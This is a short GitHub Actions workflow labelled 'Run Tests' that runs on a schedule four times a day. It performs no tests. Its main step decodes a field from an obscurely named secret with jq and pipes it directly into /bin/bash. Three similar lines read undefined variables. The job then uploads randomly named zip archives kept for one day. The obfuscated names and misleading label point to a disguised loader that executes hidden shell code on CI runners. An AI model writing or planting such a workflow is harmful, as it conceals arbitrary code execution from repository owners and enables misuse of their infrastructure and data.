name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '6 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          zspus09: ${{ secrets.zspus09 }}
        run: |
          printf '%s' "$zspus09" | jq -r .eejqu2796 | /bin/bash
          echo $laqa5198 | jq -r .fasic39 | /bin/bash
          echo $zgi3 | jq -r .r77 | /bin/bash
          printf '%s' "$mk0168" | jq -r .tzl70 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: sNYwBsGz
          path: "*.zip"
          retention-days: 1
